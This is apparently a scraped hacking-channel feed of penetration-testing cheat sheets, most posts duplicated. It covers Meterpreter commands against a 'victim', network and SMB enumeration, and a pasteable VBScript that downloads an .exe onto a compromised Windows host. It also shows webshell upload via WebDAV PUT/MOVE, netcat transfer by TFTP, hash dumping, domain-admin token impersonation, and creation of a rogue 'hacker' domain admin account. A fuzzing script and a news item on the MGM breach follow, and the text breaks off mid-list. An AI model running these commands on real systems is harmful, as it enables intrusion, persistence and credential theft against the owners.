β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ SYSTEM COMMANDS :
clearav - clears the event logs on the victim's computer
drop_token - drops a stolen token
execute - executes a command
getpid - gets the current process ID (PID)
getprivs - gets as many privileges as possible
getuid - get the user that the server is running as
kill - terminate the process designated by the PID
ps - list running processes
reboot - reboots the victim computer
reg - interact with the victim's registry
rev2self - calls RevertToSelf() on the victim machine
shell - opens a command shell on the victim machine
shutdown - shuts down the victim's computer
steal_token - attempts to steal the token of a specified (PID) process
sysinfo - gets the details about the victim computer such as OS and name
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ SYSTEM COMMANDS :
clearav - clears the event logs on the victim's computer
drop_token - drops a stolen token
execute - executes a command
getpid - gets the current process ID (PID)
getprivs - gets as many privileges as possible
getuid - get the user that the server is running as
kill - terminate the process designated by the PID
ps - list running processes
reboot - reboots the victim computer
reg - interact with the victim's registry
rev2self - calls RevertToSelf() on the victim machine
shell - opens a command shell on the victim machine
shutdown - shuts down the victim's computer
steal_token - attempts to steal the token of a specified (PID) process
sysinfo - gets the details about the victim computer such as OS and name
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to survie inside Kali Linux / Linux in general ?
Set the ip address as a varble
export ip=192.168.1.100 nmap -A -T4 -p- $ip
Netcat port Scanning
nc -nvv -w 1 -z $ip 3388-3390
Discover active IPs usign ARP on the network: arp-scan $ip/24
Discover who else is on the network
netdiscover
Discover IP Mac and Mac vendors from ARP
netdiscover -r $ip/24
Nmap stealth scan using SYN
nmap -sS $ip
Nmap stealth scan using FIN
nmap -sF $ip
Nmap Banner Grabbing
nmap -sV -sT $ip
Nmap OS Fingerprinting
nmap -O $ip
Nmap Regular Scan:
nmap $ip/24
Enumeration Scan
nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt
Enumeration Scan All Ports TCP / UDP and output to a txt file
nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip
Nmap output to a file:
nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24
Quick Scan:
nmap -T4 -F $ip/24
Quick Scan Plus:
nmap -sV -T4 -O -F --version-light $ip/24
Quick traceroute
nmap -sn --traceroute $ip
All TCP and UDP Ports
nmap -v -sU -sS -p- -A -T4 $ip
Intense Scan:
nmap -T4 -A -v $ip
Intense Scan Plus UDP
nmap -sS -sU -T4 -A -v $ip/24
Intense Scan ALL TCP Ports
nmap -p 1-65535 -T4 -A -v $ip/24
Intense Scan - No Ping
nmap -T4 -A -v -Pn $ip/24
Ping scan
nmap -sn $ip/24
Slow Comprehensive Scan
nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24
Scan with Active connect in order to weed out any spoofed ports designed to troll you
nmap -p1-65535 -A -T5 -sT $ip
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to survie inside Kali Linux / Linux in general ?
Set the ip address as a varble
export ip=192.168.1.100 nmap -A -T4 -p- $ip
Netcat port Scanning
nc -nvv -w 1 -z $ip 3388-3390
Discover active IPs usign ARP on the network: arp-scan $ip/24
Discover who else is on the network
netdiscover
Discover IP Mac and Mac vendors from ARP
netdiscover -r $ip/24
Nmap stealth scan using SYN
nmap -sS $ip
Nmap stealth scan using FIN
nmap -sF $ip
Nmap Banner Grabbing
nmap -sV -sT $ip
Nmap OS Fingerprinting
nmap -O $ip
Nmap Regular Scan:
nmap $ip/24
Enumeration Scan
nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt
Enumeration Scan All Ports TCP / UDP and output to a txt file
nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip
Nmap output to a file:
nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24
Quick Scan:
nmap -T4 -F $ip/24
Quick Scan Plus:
nmap -sV -T4 -O -F --version-light $ip/24
Quick traceroute
nmap -sn --traceroute $ip
All TCP and UDP Ports
nmap -v -sU -sS -p- -A -T4 $ip
Intense Scan:
nmap -T4 -A -v $ip
Intense Scan Plus UDP
nmap -sS -sU -T4 -A -v $ip/24
Intense Scan ALL TCP Ports
nmap -p 1-65535 -T4 -A -v $ip/24
Intense Scan - No Ping
nmap -T4 -A -v -Pn $ip/24
Ping scan
nmap -sn $ip/24
Slow Comprehensive Scan
nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24
Scan with Active connect in order to weed out any spoofed ports designed to troll you
nmap -p1-65535 -A -T5 -sT $ip
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦====== Enumeration ======
DNS Enumeration
NMAP DNS Hostnames Lookup nmap -F --dns-server <dns server ip> <target ip range>
Host Lookup
host -t ns megacorpone.com
Reverse Lookup Brute Force - find domains in the same range
for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"
Perform DNS IP Lookup
dig a domain-name-here.com @nameserver
Perform MX Record Lookup
dig mx domain-name-here.com @nameserver
Perform Zone Transfer with DIG
dig axfr domain-name-here.com @nameserver
DNS Zone Transfers
Windows DNS zone transfer
nslookup -> set type=any -> ls -d blah.com
Linux DNS zone transfer
dig axfr blah.com @ns1.blah.com
Dnsrecon DNS Brute Force
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
Dnsrecon DNS List of megacorp
dnsrecon -d megacorpone.com -t axfr
π¦DNSEnum
dnsenum zonetransfer.me
NMap Enumeration Script List:
NMap Discovery
https://nmap.org/nsedoc/categories/discovery.html
Nmap port version detection MAXIMUM power
nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>
NFS (Network File System) Enumeration
Show Mountable NFS Shares nmap -sV --script=nfs-showmount $ip
RPC (Remote Procedure Call) Enumeration
Connect to an RPC share without a username and password and enumerate privledges rpcclient --user="" --command=enumprivs -N $ip
Connect to an RPC share with a username and enumerate privledges rpcclient --user="<Username>" --command=enumprivs $ip
π¦SMB Enumeration
SMB OS Discovery
nmap $ip --script smb-os-discovery.nse
Nmap port scan
nmap -v -p 139,445 -oG smb.txt $ip-254
Netbios Information Scanning
nbtscan -r $ip/24
Nmap find exposed Netbios servers
nmap -sU --script nbstat.nse -p 137 $ip
π¦Nmap all SMB scripts scan
nmap -sV -Pn -vv -p 445 --script='(smb) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
Nmap all SMB scripts authenticated scan
nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦====== Enumeration ======
DNS Enumeration
NMAP DNS Hostnames Lookup nmap -F --dns-server <dns server ip> <target ip range>
Host Lookup
host -t ns megacorpone.com
Reverse Lookup Brute Force - find domains in the same range
for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"
Perform DNS IP Lookup
dig a domain-name-here.com @nameserver
Perform MX Record Lookup
dig mx domain-name-here.com @nameserver
Perform Zone Transfer with DIG
dig axfr domain-name-here.com @nameserver
DNS Zone Transfers
Windows DNS zone transfer
nslookup -> set type=any -> ls -d blah.com
Linux DNS zone transfer
dig axfr blah.com @ns1.blah.com
Dnsrecon DNS Brute Force
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
Dnsrecon DNS List of megacorp
dnsrecon -d megacorpone.com -t axfr
π¦DNSEnum
dnsenum zonetransfer.me
NMap Enumeration Script List:
NMap Discovery
https://nmap.org/nsedoc/categories/discovery.html
Nmap port version detection MAXIMUM power
nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>
NFS (Network File System) Enumeration
Show Mountable NFS Shares nmap -sV --script=nfs-showmount $ip
RPC (Remote Procedure Call) Enumeration
Connect to an RPC share without a username and password and enumerate privledges rpcclient --user="" --command=enumprivs -N $ip
Connect to an RPC share with a username and enumerate privledges rpcclient --user="<Username>" --command=enumprivs $ip
π¦SMB Enumeration
SMB OS Discovery
nmap $ip --script smb-os-discovery.nse
Nmap port scan
nmap -v -p 139,445 -oG smb.txt $ip-254
Netbios Information Scanning
nbtscan -r $ip/24
Nmap find exposed Netbios servers
nmap -sU --script nbstat.nse -p 137 $ip
π¦Nmap all SMB scripts scan
nmap -sV -Pn -vv -p 445 --script='(smb) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
Nmap all SMB scripts authenticated scan
nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦List all SUID files
find / -perm -4000 2>/dev/null
Determine the current version of Linux
cat /etc/issue
Determine more information about the environment
uname -a
List processes running
ps -xaf
List the allowed (and forbidden) commands for the invoking use
sudo -l
List iptables rules
iptables --table nat --list iptables -vL -t filter iptables -vL -t nat iptables -vL -t mangle iptables -vL -t raw iptables -vL -t security
net config Workstation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
net users
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦List all SUID files
find / -perm -4000 2>/dev/null
Determine the current version of Linux
cat /etc/issue
Determine more information about the environment
uname -a
List processes running
ps -xaf
List the allowed (and forbidden) commands for the invoking use
sudo -l
List iptables rules
iptables --table nat --list iptables -vL -t filter iptables -vL -t nat iptables -vL -t mangle iptables -vL -t raw iptables -vL -t security
net config Workstation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
net users
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Simple Local Web Servers
1οΈβ£Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80
2οΈβ£Run a basic Python3 http server, great for serving up shells etc
python3 -m http.server
3οΈβ£Run a ruby webrick basic http server
ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"
4οΈβ£Run a basic PHP http server
php -S $ip:80
5οΈβ£Creating a wget VB Script on Windows:
https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt
6οΈβ£Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):
7οΈβ£ echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1
echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
timeout 1
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
timeout 1
echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
timeout 1
echo xHttp.Open "GET", Url, False >> webdl.vbs
timeout 1
echo xHttp.Send >> webdl.vbs
timeout 1
echo with bStrm >> webdl.vbs
timeout 1
echo .type = 1 ' >> webdl.vbs
timeout 1
echo .open >> webdl.vbs
timeout 1
echo .write xHttp.responseBody >> webdl.vbs
timeout 1
echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs
timeout 1
echo end with >> webdl.vbs
timeout 1
echo
8οΈβ£The file can be run using the following syntax:
C:\temp\cscript.exe webdl.vbs
Mounting File Shares
Mount NFS share to /mnt/nfs
mount $ip:/vol/share /mnt/nfs
HTTP Put
nmap -p80 $ip --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php
π¦Uploading Files
SCP
1οΈβ£scp username1@sourcehost:directory1/filename1 username2@destinationhost:directory2/filename2
2οΈβ£scp localfile username@$ip:~/Folder/
3οΈβ£scp LinuxExploitSuggester.pl bob@192.168.1.10:~
4οΈβ£Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor
5οΈβ£davtest -move -sendbd auto -url http://$ip
https://github.com/cldrn/davtest
6οΈβ£You can also upload a file using the PUT method with the curl command:
>curl -T 'leetshellz.txt' 'http://$ip'
7οΈβ£And rename it to an executable file using the MOVE method with the curl command:
> curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'
π¦TFTP
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
EX. FROM WINDOWS HOST:
C:\Users\Offsec>tftp -i $ip get nc.exe
> FTP
apt-get update && apt-get install pure-ftpd
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Simple Local Web Servers
1οΈβ£Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80
2οΈβ£Run a basic Python3 http server, great for serving up shells etc
python3 -m http.server
3οΈβ£Run a ruby webrick basic http server
ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"
4οΈβ£Run a basic PHP http server
php -S $ip:80
5οΈβ£Creating a wget VB Script on Windows:
https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt
6οΈβ£Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):
7οΈβ£ echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1
echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
timeout 1
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
timeout 1
echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
timeout 1
echo xHttp.Open "GET", Url, False >> webdl.vbs
timeout 1
echo xHttp.Send >> webdl.vbs
timeout 1
echo with bStrm >> webdl.vbs
timeout 1
echo .type = 1 ' >> webdl.vbs
timeout 1
echo .open >> webdl.vbs
timeout 1
echo .write xHttp.responseBody >> webdl.vbs
timeout 1
echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs
timeout 1
echo end with >> webdl.vbs
timeout 1
echo
8οΈβ£The file can be run using the following syntax:
C:\temp\cscript.exe webdl.vbs
Mounting File Shares
Mount NFS share to /mnt/nfs
mount $ip:/vol/share /mnt/nfs
HTTP Put
nmap -p80 $ip --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php
π¦Uploading Files
SCP
1οΈβ£scp username1@sourcehost:directory1/filename1 username2@destinationhost:directory2/filename2
2οΈβ£scp localfile username@$ip:~/Folder/
3οΈβ£scp LinuxExploitSuggester.pl bob@192.168.1.10:~
4οΈβ£Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor
5οΈβ£davtest -move -sendbd auto -url http://$ip
https://github.com/cldrn/davtest
6οΈβ£You can also upload a file using the PUT method with the curl command:
>curl -T 'leetshellz.txt' 'http://$ip'
7οΈβ£And rename it to an executable file using the MOVE method with the curl command:
> curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'
π¦TFTP
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
EX. FROM WINDOWS HOST:
C:\Users\Offsec>tftp -i $ip get nc.exe
> FTP
apt-get update && apt-get install pure-ftpd
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - cldrn/davtest: davtest (improved)- Exploits WebDAV folders
davtest (improved)- Exploits WebDAV folders. Contribute to cldrn/davtest development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦PSK-Crack :
Brute force:
$psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations
no match found for MD5 hash 5c178dSNIP
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)
Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset=
$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking modde
Brute force with 63 chars up to length 5 will take up to 992436543 iterations
----------------------------------------------------------------------------------------------------------------------------------
Dictionary attack:
$psk-crack -d /path/to/dictionary 192-168-207-134key
Running in dictionary cracking mode
no match found for MD5 hash 5c178dSNIP
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)
--------------------------------------------------------------------------------------------
References: http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦PSK-Crack :
Brute force:
$psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations
no match found for MD5 hash 5c178dSNIP
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)
Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset=
$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking modde
Brute force with 63 chars up to length 5 will take up to 992436543 iterations
----------------------------------------------------------------------------------------------------------------------------------
Dictionary attack:
$psk-crack -d /path/to/dictionary 192-168-207-134key
Running in dictionary cracking mode
no match found for MD5 hash 5c178dSNIP
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)
--------------------------------------------------------------------------------------------
References: http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html
β β β Uππ»βΊπ«Δπ¬πβ β β β
Carnal0Wnage
Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain
There hasnt been much in the way of updates on breaking into VPN servers that have aggressive mode enabled. ike-scan is probably still you...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Cisco IOS Command Line Cheatsheet
---------------------------------
--- Verify Basic Configuration:
Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS, etc.
SW1# show version
Shows the current configuration file stored in DRAM.
SW1# show running-config
Shows the configuration file stored in NVRAM which is used at first boot process.
SW1# show startup-config
Lists the commands currently held in the history buffer.
SW1# show history
Shows an overview of all interfaces, their physical status, protocol status and ip address if assigned.
SW1# show ip interface brief
Shows detailed information about the specified interface, its status, protocol, duplex, speed, encapsulation, last 5 min traffic.
SW1# show interface vlan 1
Shows the description of all interfaces
SW1# show interfaces description
Shows the status of all interfaces like connected or not, speed, duplex, trunk or access vlan.
SW1# show interfaces status
Shows the public encryption key used for SSH.
SW1# show crypto key mypubkey rsa
Shows information about the leased IP address (when an interface is configured to get IP address via a dhcp server)
SW1# show dhcp lease
Show the router's routing table. List of all networks that the router can reach.
Router# show ip route
--- Router Modes:
Router>: User mode = Limited to basic monitoring commands
Router#: Privileged mode (exec-level mode) = Provides access to all other router commands
Router(config)#: global configuration mode = Commands that affect the entire system
Router(config-if)#: interface mode = Commands that affect interfaces
Router(config-subif)#: subinterface mode = Commands that affect subinterfaces
Router(config-line)#: line mode = Commands that affect in lines modes (console, vty, auxβ¦)
Router(config-router)#: router configuration mode
--- Changing switch hostname:
Switch(config)# hostname SW1
--- Configuring passwords:
SW1(config)# enable secret cisco ! MD5 hash
SW1(config)# enable password notcisco ! Clear text
--- Securing console port:
SW1(config)# line con 0
SW1(config-line)# password cisco
SW1(config-line)# login
--- Securing terminal lines:
SW1(config)# line vty 0 4
SW1(config-line)# password cisco
SW1(config-line)# login
--- Encrypting passwords:
SW1(config)# service password-encryption
--- Configuring banners:
SW1(config)# banner motd $
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
UNAUTHORIZED ACCESS IS PROHIBITED
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
$
--- Giving the switch an IP address:
SW1(config)# interface vlan 1
SW1(config-if)# ip address 172.16.1.11 255.255.255.0 ! or DHCP
SW1(config-if)# no shutdown
--- Setting the default gateway:
SW1(config)# ip default-gateway 172.16.1.1
--- Saving configuration:
SW1# copy running-config startup-config
Destination filename startup-config? ! Press enter to confirm file name.
Building configurationβ¦
OK
! Short for write memory.
SW1# wr
Building configurationβ¦
OK
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Cisco IOS Command Line Cheatsheet
---------------------------------
--- Verify Basic Configuration:
Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS, etc.
SW1# show version
Shows the current configuration file stored in DRAM.
SW1# show running-config
Shows the configuration file stored in NVRAM which is used at first boot process.
SW1# show startup-config
Lists the commands currently held in the history buffer.
SW1# show history
Shows an overview of all interfaces, their physical status, protocol status and ip address if assigned.
SW1# show ip interface brief
Shows detailed information about the specified interface, its status, protocol, duplex, speed, encapsulation, last 5 min traffic.
SW1# show interface vlan 1
Shows the description of all interfaces
SW1# show interfaces description
Shows the status of all interfaces like connected or not, speed, duplex, trunk or access vlan.
SW1# show interfaces status
Shows the public encryption key used for SSH.
SW1# show crypto key mypubkey rsa
Shows information about the leased IP address (when an interface is configured to get IP address via a dhcp server)
SW1# show dhcp lease
Show the router's routing table. List of all networks that the router can reach.
Router# show ip route
--- Router Modes:
Router>: User mode = Limited to basic monitoring commands
Router#: Privileged mode (exec-level mode) = Provides access to all other router commands
Router(config)#: global configuration mode = Commands that affect the entire system
Router(config-if)#: interface mode = Commands that affect interfaces
Router(config-subif)#: subinterface mode = Commands that affect subinterfaces
Router(config-line)#: line mode = Commands that affect in lines modes (console, vty, auxβ¦)
Router(config-router)#: router configuration mode
--- Changing switch hostname:
Switch(config)# hostname SW1
--- Configuring passwords:
SW1(config)# enable secret cisco ! MD5 hash
SW1(config)# enable password notcisco ! Clear text
--- Securing console port:
SW1(config)# line con 0
SW1(config-line)# password cisco
SW1(config-line)# login
--- Securing terminal lines:
SW1(config)# line vty 0 4
SW1(config-line)# password cisco
SW1(config-line)# login
--- Encrypting passwords:
SW1(config)# service password-encryption
--- Configuring banners:
SW1(config)# banner motd $
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
UNAUTHORIZED ACCESS IS PROHIBITED
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
$
--- Giving the switch an IP address:
SW1(config)# interface vlan 1
SW1(config-if)# ip address 172.16.1.11 255.255.255.0 ! or DHCP
SW1(config-if)# no shutdown
--- Setting the default gateway:
SW1(config)# ip default-gateway 172.16.1.1
--- Saving configuration:
SW1# copy running-config startup-config
Destination filename startup-config? ! Press enter to confirm file name.
Building configurationβ¦
OK
! Short for write memory.
SW1# wr
Building configurationβ¦
OK
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦[+] After compromising a Windows machine:
[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain
[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE
[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts 10.10.10.0/24
msf > set threads 8
msf > run
msf> spool off
[>] Compromise Admin's box
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
meterpreter > shell
C:\> whoami
mydom\adaministrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦[+] After compromising a Windows machine:
[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain
[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE
[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts 10.10.10.0/24
msf > set threads 8
msf > run
msf> spool off
[>] Compromise Admin's box
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
meterpreter > shell
C:\> whoami
mydom\adaministrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦More than 142 million MGM hotel guest details are sold on the dark web :
> data breach affected more people than originally reported. This is how MGM Resorts International found itself. In a hacker attack in 2019, it initially said it affected 10.6 million guests, and now it is believed that more than 142 million people have been involved. As early as February, there were reports that the personal data of more than 10.6 million people staying at MGM Resorts was posted on a hacker forum.
> Now, there is an advertisement on the dark web providing detailed information of 142,479,937 MGM hotel guests at a price of just over $2,900. Later, people found that the actual asking price was much higher. Allegedly, this information includes data of celebrities and government employees, including name, address, e-mail, phone number and date of birth. MGM said that financial information, ID card or social security number and hotel accommodation details are not included in this loophole. ZDNet contacted some past hotel guests to confirm the accuracy of the list.
> The details of MGM came from a data breach at the hotel last year. An unauthorized hacker accessed a cloud server that contained information about past guests. The chain said it had notified all affected people in accordance with the requirements of national law. The person who posted the advertisement claimed that the data actually came from a recent attack by data breach monitoring service DataViper, but the company denied having a full MGM database and said the hackers tried to damage the company's reputation.
> MGM said it always knew how many guests' data was leaked in the leak, but it was not required by law to disclose this number. MGM Resorts International is aware of the scope of the incident reported before last summer and has dealt with the situation. Surprisingly, the actual number of affected guests may be higher. A post on the Russian Hacking Forum stated that there are details of 200 million people on the list.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦More than 142 million MGM hotel guest details are sold on the dark web :
> data breach affected more people than originally reported. This is how MGM Resorts International found itself. In a hacker attack in 2019, it initially said it affected 10.6 million guests, and now it is believed that more than 142 million people have been involved. As early as February, there were reports that the personal data of more than 10.6 million people staying at MGM Resorts was posted on a hacker forum.
> Now, there is an advertisement on the dark web providing detailed information of 142,479,937 MGM hotel guests at a price of just over $2,900. Later, people found that the actual asking price was much higher. Allegedly, this information includes data of celebrities and government employees, including name, address, e-mail, phone number and date of birth. MGM said that financial information, ID card or social security number and hotel accommodation details are not included in this loophole. ZDNet contacted some past hotel guests to confirm the accuracy of the list.
> The details of MGM came from a data breach at the hotel last year. An unauthorized hacker accessed a cloud server that contained information about past guests. The chain said it had notified all affected people in accordance with the requirements of national law. The person who posted the advertisement claimed that the data actually came from a recent attack by data breach monitoring service DataViper, but the company denied having a full MGM database and said the hackers tried to damage the company's reputation.
> MGM said it always knew how many guests' data was leaked in the leak, but it was not required by law to disclose this number. MGM Resorts International is aware of the scope of the incident reported before last summer and has dealt with the situation. Surprisingly, the actual number of affected guests may be higher. A post on the Russian Hacking Forum stated that there are details of 200 million people on the list.
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Exploit Development
----------------------
[+] Fuzzing:
import socket
buffer = ["A"]
counter = 50
while len(buffer) <= 1000:
buffer.append("A" * counter)
counter = counter + 50
for buffstring in buffer:
print "Fuzzing:" + str(len(buffstring))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect( ("192.168.0.20", 5555) )
sock.send(buffstring)
sock.close()
[+] Bad Character Testing:
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e"
"\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d"
"\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c"
"\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b"
"\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
"\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59"
"\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68"
"\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77"
